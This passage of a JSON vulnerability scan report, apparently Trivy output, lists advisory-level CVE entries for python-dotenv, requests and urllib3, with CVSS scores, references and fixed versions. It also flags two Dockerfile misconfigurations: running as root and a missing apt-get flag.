"Description": "python-dotenv reads key-value pairs from a .env file and can set them as environment variables. Prior to version 1.2.2, `set_key()` and `unset_key()` in python-dotenv follow symbolic links when rewriting `.env` files, allowing a local attacker to overwrite arbitrary files via a crafted symlink when a cross-device rename fallback is triggered. Users should upgrade to v.1.2.2 or, as a workaround, apply the patch manually.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-59",
"CWE-61"
],
"VendorSeverity": {
"ghsa": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H",
"V3Score": 6.6
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"V3Score": 7.1
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-28684",
"https://github.com/theskumar/python-dotenv",
"https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311",
"https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch",
"https://github.com/theskumar/python-dotenv/releases/tag/v1.2.2",
"https://github.com/theskumar/python-dotenv/security/advisories/GHSA-mf9w-mj56-hr94",
"https://nvd.nist.gov/vuln/detail/CVE-2026-28684",
"https://www.cve.org/CVERecord?id=CVE-2026-28684"
],
"PublishedDate": "2026-04-20T17:16:33.087Z",
"LastModifiedDate": "2026-06-17T10:28:54.243Z"
},
{
"VulnerabilityID": "CVE-2024-47081",
"PkgName": "requests",
"PkgIdentifier": {
"PURL": "pkg:pypi/requests@2.32.3"
},
"InstalledVersion": "2.32.3",
"FixedVersion": "2.32.4",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-47081",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "requests: Requests vulnerable to .netrc credentials leak via malicious URLs",
"Description": "Requests is a HTTP library. Due to a URL parsing issue, Requests releases prior to 2.32.4 may leak .netrc credentials to third parties for specific maliciously-crafted URLs. Users should upgrade to version 2.32.4 to receive a fix. For older versions of Requests, use of the .netrc file can be disabled with `trust_env=False` on one's Requests Session.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-522"
],
"VendorSeverity": {
"alma": 2,
"amazon": 2,
"azure": 2,
"cbl-mariner": 2,
"ghsa": 2,
"oracle-oval": 2,
"photon": 2,
"redhat": 2,
"rocky": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 5.3
}
},
"References": [
"http://seclists.org/fulldisclosure/2025/Jun/2",
"http://www.openwall.com/lists/oss-security/2025/06/03/11",
"http://www.openwall.com/lists/oss-security/2025/06/03/9",
"http://www.openwall.com/lists/oss-security/2025/06/04/1",
"http://www.openwall.com/lists/oss-security/2025/06/04/6",
"https://access.redhat.com/errata/RHSA-2025:12519",
"https://access.redhat.com/security/cve/CVE-2024-47081",
"https://bugzilla.redhat.com/2371272",
"https://bugzilla.redhat.com/show_bug.cgi?id=2371272",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47081",
"https://errata.almalinux.org/9/ALSA-2025-12519.html",
"https://errata.rockylinux.org/RLSA-2025:13234",
"https://github.com/psf/requests",
"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef",
"https://github.com/psf/requests/pull/6965",
"https://github.com/psf/requests/security/advisories/GHSA-9hjg-9r4m-mvj7",
"https://linux.oracle.com/cve/CVE-2024-47081.html",
"https://linux.oracle.com/errata/ELSA-2025-14999.html",
"https://nvd.nist.gov/vuln/detail/CVE-2024-47081",
"https://requests.readthedocs.io/en/latest/api/#requests.Session.trust_env",
"https://seclists.org/fulldisclosure/2025/Jun/2",
"https://ubuntu.com/security/notices/USN-7568-1",
"https://ubuntu.com/security/notices/USN-7762-1",
"https://www.cve.org/CVERecord?id=CVE-2024-47081",
"https://www.openwall.com/lists/oss-security/2025/06/03/9"
],
"PublishedDate": "2025-06-09T18:15:24.983Z",
"LastModifiedDate": "2026-06-17T07:56:30.697Z"
},
{
"VulnerabilityID": "CVE-2026-25645",
"PkgName": "requests",
"PkgIdentifier": {
"PURL": "pkg:pypi/requests@2.32.3"
},
"InstalledVersion": "2.32.3",
"FixedVersion": "2.33.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25645",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "requests: Requests: Security bypass due to predictable temporary file creation",
"Description": "Requests is a HTTP library. Prior to version 2.33.0, the `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one. Standard usage of the Requests library is not affected by this vulnerability. Only applications that call `extract_zipped_paths()` directly are impacted. Starting in version 2.33.0, the library extracts files to a non-deterministic location. If developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-377"
],
"VendorSeverity": {
"azure": 2,
"ghsa": 2,
"nvd": 2,
"photon": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N",
"V3Score": 4.4
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"V3Score": 5.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
"V3Score": 4.7
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-25645",
"https://github.com/psf/requests",
"https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7",
"https://github.com/psf/requests/releases/tag/v2.33.0",
"https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2",
"https://nvd.nist.gov/vuln/detail/CVE-2026-25645",
"https://www.cve.org/CVERecord?id=CVE-2026-25645"
],
"PublishedDate": "2026-03-25T17:16:52.97Z",
"LastModifiedDate": "2026-06-17T10:25:00.443Z"
},
{
"VulnerabilityID": "CVE-2025-66418",
"PkgName": "urllib3",
"PkgIdentifier": {
"PURL": "pkg:pypi/urllib3@2.4.0"
},
"InstalledVersion": "2.4.0",
"FixedVersion": "2.6.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-66418",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "urllib3: urllib3: Unbounded decompression chain leads to resource exhaustion",
"Description": "urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.24 and prior to 2.6.0, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. This vulnerability is fixed in 2.6.0.",
"Severity": "HIGH",
"CweIDs": [
"CWE-770"
],
"VendorSeverity": {
"alma": 3,
"amazon": 3,
"azure": 3,
"cbl-mariner": 3,
"ghsa": 3,
"nvd": 3,
"oracle-oval": 3,
"photon": 3,
"redhat": 3,
"rocky": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/errata/RHSA-2026:1239",
"https://access.redhat.com/security/cve/CVE-2025-66418",
"https://bugzilla.redhat.com/2419455",
"https://bugzilla.redhat.com/2419467",
"https://bugzilla.redhat.com/2427726",
"https://bugzilla.redhat.com/show_bug.cgi?id=2419455",
"https://bugzilla.redhat.com/show_bug.cgi?id=2419467",
"https://bugzilla.redhat.com/show_bug.cgi?id=2427726",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66418",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66471",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21441",
"https://errata.almalinux.org/9/ALSA-2026-1239.html",
"https://errata.rockylinux.org/RLSA-2026:1254",
"https://github.com/urllib3/urllib3",
"https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8",
"https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53",
"https://linux.oracle.com/cve/CVE-2025-66418.html",
"https://linux.oracle.com/errata/ELSA-2026-1254.html",
"https://nvd.nist.gov/vuln/detail/CVE-2025-66418",
"https://ubuntu.com/security/notices/USN-7927-1",
"https://ubuntu.com/security/notices/USN-8010-1",
"https://ubuntu.com/security/notices/USN-8344-1",
"https://www.cve.org/CVERecord?id=CVE-2025-66418",
"https://www.openwall.com/lists/oss-security/2025/12/05/4"
],
"PublishedDate": "2025-12-05T16:15:51.053Z",
"LastModifiedDate": "2026-06-17T09:56:48.383Z"
},
{
"VulnerabilityID": "CVE-2025-66471",
"PkgName": "urllib3",
"PkgIdentifier": {
"PURL": "pkg:pypi/urllib3@2.4.0"
},
"InstalledVersion": "2.4.0",
"FixedVersion": "2.6.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-66471",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "urllib3: urllib3 Streaming API improperly handles highly compressed data",
"Description": "urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.0 and prior to 2.6.0, the Streaming API improperly handles highly compressed data. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data.",
"Severity": "HIGH",
"CweIDs": [
"CWE-409"
],
"VendorSeverity": {
"alma": 3,
"amazon": 3,
"azure": 3,
"cbl-mariner": 3,
"ghsa": 3,
"nvd": 3,
"oracle-oval": 3,
"photon": 3,
"redhat": 3,
"rocky": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/errata/RHSA-2026:1239",
"https://access.redhat.com/security/cve/CVE-2025-66471",
"https://bugzilla.redhat.com/2419455",
"https://bugzilla.redhat.com/2419467",
"https://bugzilla.redhat.com/2427726",
"https://bugzilla.redhat.com/show_bug.cgi?id=2419455",
"https://bugzilla.redhat.com/show_bug.cgi?id=2419467",
"https://bugzilla.redhat.com/show_bug.cgi?id=2427726",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66418",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66471",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21441",
"https://errata.almalinux.org/9/ALSA-2026-1239.html",
"https://errata.rockylinux.org/RLSA-2026:1254",
"https://github.com/urllib3/urllib3",
"https://github.com/urllib3/urllib3/commit/c19571de34c47de3a766541b041637ba5f716ed7",
"https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37",
"https://linux.oracle.com/cve/CVE-2025-66471.html",
"https://linux.oracle.com/errata/ELSA-2026-1254.html",
"https://nvd.nist.gov/vuln/detail/CVE-2025-66471",
"https://ubuntu.com/security/notices/USN-7927-1",
"https://ubuntu.com/security/notices/USN-7927-2",
"https://ubuntu.com/security/notices/USN-7927-3",
"https://ubuntu.com/security/notices/USN-8344-1",
"https://ubuntu.com/security/notices/USN-8344-2",
"https://ubuntu.com/security/notices/USN-8344-3",
"https://www.cve.org/CVERecord?id=CVE-2025-66471",
"https://www.openwall.com/lists/oss-security/2025/12/05/4"
],
"PublishedDate": "2025-12-05T17:16:04.4Z",
"LastModifiedDate": "2026-06-17T09:56:53.65Z"
},
{
"VulnerabilityID": "CVE-2026-21441",
"PkgName": "urllib3",
"PkgIdentifier": {
"PURL": "pkg:pypi/urllib3@2.4.0"
},
"InstalledVersion": "2.4.0",
"FixedVersion": "2.6.3",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-21441",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "urllib3: urllib3 vulnerable to decompression-bomb safeguard bypass when following HTTP redirects (streaming API)",
"Description": "urllib3 is an HTTP client library for Python. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. Starting in version 1.22 and prior to version 2.6.3, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client. Applications and libraries are affected when they stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. Users should upgrade to at least urllib3 v2.6.3, in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable redirects by setting `redirect=False` for requests to untrusted source.",
"Severity": "HIGH",
"CweIDs": [
"CWE-409"
],
"VendorSeverity": {
"alma": 3,
"amazon": 3,
"azure": 3,
"cbl-mariner": 3,
"ghsa": 3,
"nvd": 3,
"oracle-oval": 3,
"photon": 3,
"redhat": 3,
"rocky": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/errata/RHSA-2026:1239",
"https://access.redhat.com/security/cve/CVE-2026-21441",
"https://bugzilla.redhat.com/2419455",
"https://bugzilla.redhat.com/2419467",
"https://bugzilla.redhat.com/2427726",
"https://bugzilla.redhat.com/show_bug.cgi?id=2419455",
"https://bugzilla.redhat.com/show_bug.cgi?id=2419467",
"https://bugzilla.redhat.com/show_bug.cgi?id=2427726",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66418",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66471",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21441",
"https://errata.almalinux.org/9/ALSA-2026-1239.html",
"https://errata.rockylinux.org/RLSA-2026:1254",
"https://github.com/urllib3/urllib3",
"https://github.com/urllib3/urllib3/commit/8864ac407bba8607950025e0979c4c69bc7abc7b",
"https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99",
"https://linux.oracle.com/cve/CVE-2026-21441.html",
"https://linux.oracle.com/errata/ELSA-2026-1254.html",
"https://lists.debian.org/debian-lts-announce/2026/01/msg00017.html",
"https://nvd.nist.gov/vuln/detail/CVE-2026-21441",
"https://ubuntu.com/security/notices/USN-7955-1",
"https://ubuntu.com/security/notices/USN-7955-2",
"https://ubuntu.com/security/notices/USN-8010-1",
"https://www.cve.org/CVERecord?id=CVE-2026-21441"
],
"PublishedDate": "2026-01-07T22:15:44.04Z",
"LastModifiedDate": "2026-06-17T10:18:40.75Z"
},
{
"VulnerabilityID": "CVE-2026-44431",
"PkgName": "urllib3",
"PkgIdentifier": {
"PURL": "pkg:pypi/urllib3@2.4.0"
},
"InstalledVersion": "2.4.0",
"FixedVersion": "2.7.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44431",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "urllib3: urllib3: Information disclosure via cross-origin redirects forwarding sensitive headers",
"Description": "urllib3 is an HTTP client library for Python. From 1.23 to before 2.7.0, cross-origin redirects followed from the low-level API via ProxyManager.connection_from_url().urlopen(..., assert_same_host=False) still forward these sensitive headers. This vulnerability is fixed in 2.7.0.",
"Severity": "HIGH",
"CweIDs": [
"CWE-200"
],
"VendorSeverity": {
"amazon": 2,
"azure": 3,
"ghsa": 3,
"nvd": 2,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"V3Score": 5.3
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 5.9
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-44431",
"https://github.com/urllib3/urllib3",
"https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc",
"https://nvd.nist.gov/vuln/detail/CVE-2026-44431",
"https://ubuntu.com/security/notices/USN-8379-1",
"https://www.cve.org/CVERecord?id=CVE-2026-44431"
],
"PublishedDate": "2026-05-13T16:16:57.15Z",
"LastModifiedDate": "2026-06-17T10:50:38.253Z"
},
{
"VulnerabilityID": "CVE-2025-50181",
"PkgName": "urllib3",
"PkgIdentifier": {
"PURL": "pkg:pypi/urllib3@2.4.0"
},
"InstalledVersion": "2.4.0",
"FixedVersion": "2.5.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-50181",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "urllib3: urllib3 redirects are not disabled when retries are disabled on PoolManager instantiation",
"Description": "urllib3 is a user-friendly HTTP client library for Python. Prior to 2.5.0, it is possible to disable redirects for all requests by instantiating a PoolManager and specifying retries in a way that disable redirects. By default, requests and botocore users are not affected. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. This issue has been patched in version 2.5.0.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-601"
],
"VendorSeverity": {
"amazon": 2,
"azure": 2,
"cbl-mariner": 2,
"ghsa": 2,
"nvd": 2,
"photon": 2,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 5.3
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"V3Score": 6.1
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2025-50181",
"https://github.com/urllib3/urllib3",
"https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857",
"https://github.com/urllib3/urllib3/releases/tag/2.5.0",
"https://github.com/urllib3/urllib3/security/advisories/GHSA-pq67-6m6q-mj2v",
"https://nvd.nist.gov/vuln/detail/CVE-2025-50181",
"https://ubuntu.com/security/notices/USN-7599-1",
"https://ubuntu.com/security/notices/USN-7599-2",
"https://www.cve.org/CVERecord?id=CVE-2025-50181"
],
"PublishedDate": "2025-06-19T01:15:24.453Z",
"LastModifiedDate": "2026-06-17T09:34:48.843Z"
},
{
"VulnerabilityID": "CVE-2025-50182",
"PkgName": "urllib3",
"PkgIdentifier": {
"PURL": "pkg:pypi/urllib3@2.4.0"
},
"InstalledVersion": "2.4.0",
"FixedVersion": "2.5.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-50182",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "urllib3: urllib3 does not control redirects in browsers and Node.js",
"Description": "urllib3 is a user-friendly HTTP client library for Python. Starting in version 2.2.0 and prior to 2.5.0, urllib3 does not control redirects in browsers and Node.js. urllib3 supports being used in a Pyodide runtime utilizing the JavaScript Fetch API or falling back on XMLHttpRequest. This means Python libraries can be used to make HTTP requests from a browser or Node.js. Additionally, urllib3 provides a mechanism to control redirects, but the retries and redirect parameters are ignored with Pyodide; the runtime itself determines redirect behavior. This issue has been patched in version 2.5.0.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-601"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 5.3
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"V3Score": 6.1
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2025-50182",
"https://github.com/urllib3/urllib3",
"https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f",
"https://github.com/urllib3/urllib3/releases/tag/2.5.0",
"https://github.com/urllib3/urllib3/security/advisories/GHSA-48p4-8xcf-vxj5",
"https://nvd.nist.gov/vuln/detail/CVE-2025-50182",
"https://ubuntu.com/security/notices/USN-7599-1",
"https://www.cve.org/CVERecord?id=CVE-2025-50182"
],
"PublishedDate": "2025-06-19T02:15:17.967Z",
"LastModifiedDate": "2026-06-17T09:34:48.95Z"
}
]
},
{
"Target": "Dockerfile",
"Class": "config",
"Type": "dockerfile",
"MisconfSummary": {
"Successes": 22,
"Failures": 2,
"Exceptions": 0
},
"Misconfigurations": [
{
"Type": "Dockerfile Security Check",
"ID": "DS002",
"AVDID": "AVD-DS-0002",
"Title": "Image user should not be 'root'",
"Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.",
"Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument",
"Namespace": "builtin.dockerfile.DS002",
"Query": "data.builtin.dockerfile.DS002.deny",
"Resolution": "Add 'USER <non root user name>' line to the Dockerfile",
"Severity": "HIGH",
"PrimaryURL": "https://avd.aquasec.com/misconfig/ds002",
"References": [
"https://docs.docker.com/develop/develop-images/dockerfile_best-practices/",
"https://avd.aquasec.com/misconfig/ds002"
],
"Status": "FAIL",
"Layer": {},
"CauseMetadata": {
"Provider": "Dockerfile",
"Service": "general",
"Code": {
"Lines": null
}
}
},
{
"Type": "Dockerfile Security Check",
"ID": "DS029",
"AVDID": "AVD-DS-0029",
"Title": "'apt-get' missing '--no-install-recommends'",
"Description": "'apt-get' install should use '--no-install-recommends' to minimize image size.",
"Message": "'--no-install-recommends' flag is missed: 'apt-get update && apt-get install -y python3 python3-dev python3-pip libgl1-mesa-glx libglib2.0-0 libcudnn9-cuda-12=9.5.1.* curl && rm -rf /var/lib/apt/lists/*'",
"Namespace": "builtin.dockerfile.DS029",
"Query": "data.builtin.dockerfile.DS029.deny",
"Resolution": "Add '--no-install-recommends' flag to 'apt-get'",
"Severity": "HIGH",
"PrimaryURL": "https://avd.aquasec.com/misconfig/ds029",
"References": [
"https://docs.docker.com/develop/develop-images/dockerfile_best-practices/",
"https://avd.aquasec.com/misconfig/ds029"
],
"Status": "FAIL",
"Layer": {},
"CauseMetadata": {
"Provider": "Dockerfile",
"Service": "general",
"StartLine": 5,
"EndLine": 13,
"Code": {
"Lines": [
{
"Number": 5,
"Content": " RUN apt-get update && apt-get install -y \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": " RUN apt-get update \u001b[38;5;245m&&\u001b[0m apt-get install -y \u001b[38;5;124m\\",
"FirstCause": true,
"LastCause": false
},
{
"Number": 6,
"Content": " python3 \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m python3 \u001b[38;5;124m\\",
"FirstCause": false,
"LastCause": false
},
{
"Number": 7,
"Content": " python3-dev \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m python3-dev \u001b[38;5;124m\\",
"FirstCause": false,
"LastCause": false
},
{
"Number": 8,
"Content": " python3-pip \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m python3-pip \u001b[38;5;124m\\",
"FirstCause": false,
"LastCause": false
},
{
"Number": 9,
"Content": " libgl1-mesa-glx \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m libgl1-mesa-glx \u001b[38;5;124m\\",
"FirstCause": false,
"LastCause": false
},
{
"Number": 10,
"Content": " libglib2.0-0 \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m libglib2.0-0 \u001b[38;5;124m\\",
"FirstCause": false,
"LastCause": false
},
{
"Number": 11,
"Content": " libcudnn9-cuda-12=9.5.1.* \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m libcudnn9-cuda-12\u001b[38;5;245m=\u001b[0m9.5.1.* \u001b[38;5;124m\\",
"FirstCause": false,
"LastCause": false
},
{
"Number": 12,
"Content": " curl \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m curl \u001b[38;5;124m\\",
"FirstCause": false,
"LastCause": false
},
{
"Number": 13,
"Content": " && rm -rf /var/lib/apt/lists/*",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m \u001b[38;5;245m&&\u001b[0m rm -rf /var/lib/apt/lists/*",
"FirstCause": false,
"LastCause": true
}
]
}
}
}
]
}
]
}